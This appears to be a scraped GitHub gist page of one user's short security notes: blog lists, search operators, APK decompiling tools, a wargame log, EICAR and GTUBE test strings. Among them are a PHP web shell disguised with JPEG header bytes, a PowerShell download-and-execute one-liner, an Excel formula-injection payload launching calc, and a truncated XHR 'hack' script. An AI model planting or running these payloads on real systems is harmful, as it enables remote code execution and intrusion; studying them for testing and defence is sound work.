Petr Pospíšil SleepyLctl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The list below shows some of the blogs and feeds that might be useful to the security analyst when investigating incidents. | |
| • http://blogs.cisco.com/security/ | |
| • http://malware-traffic-analysis.net/ | |
| • http://malware.dontneedcoffee.com/ | |
| • http://myonlinesecurity.co.uk/ | |
| • http://krebsonsecurity.com/ | |
| • http://blog.dynamoo.com/ | |
| • http://sanesecurity.blogspot.co.uk/ | |
| • http://blog.0x3a.com/ | |
| • http://blog.trendmicro.com/trendlabs-security-intelligence/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ÿØÿà | |
| <form action="" method="get"> | |
| Command: <input type="text" name="cmd" /><input type="submit" value="Exec" /> | |
| </form> | |
| Output:<br /> | |
| <pre><?php passthru($_REQUEST['cmd'], $result); ?></pre> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| intitle: | |
| inurl: | |
| intext: | |
| define: | |
| site: | |
| phonebook: | |
| maps: | |
| book: | |
| info: | |
| movie: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| APK to java | |
| -- dex2jar + jd-gui | |
| -- jadx | |
| -- apktool? | |
| https://stackoverflow.com/questions/1249973/decompiling-dex-into-java-sourcecode |
SleepyLctl
/ gist:f0c367fa2a49b7c76b844d5daf96b230
Created
May 3, 2018 11:27
Powershell stuff and tips
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################## | |
| Execute PS script remotely | |
| ######################################## | |
| iex ((new-object net.webclient).downloadstring('https://url/install.ps1')) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Excel Formula Injection | |
| @SUM(1+1)*cmd|' /C calc'!A0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <script> | |
| function hack() | |
| { | |
| var xmlhttp; | |
| if (window.XMLHttpRequest) | |
| { | |
| xmlhttp=new XMLHttpRequest(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| century.underthewire.tech:6009 | |
| 1. Version of Powershell Build = 10.0.14409.1012 | |
| $PSVersionTable | |
| 2. Download a file = invoke-webrequest80 | |
| Invoke-WebRequest | |
| 3. Number of files on the desktop. | |
| Get-ChildItem ..\desktop\ | Measure-Object |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| EICAR Test String | |
| (anti-virus) X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* | |
| When an anti-virus program scans this file, it reports that it finds the EICAR-STANDARD-AV-TEST-FILE virus. | |
| GTUBE Test String | |
| (spam) XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X | |
| For further information, see: http://spamassassin.apache.org/gtube/. |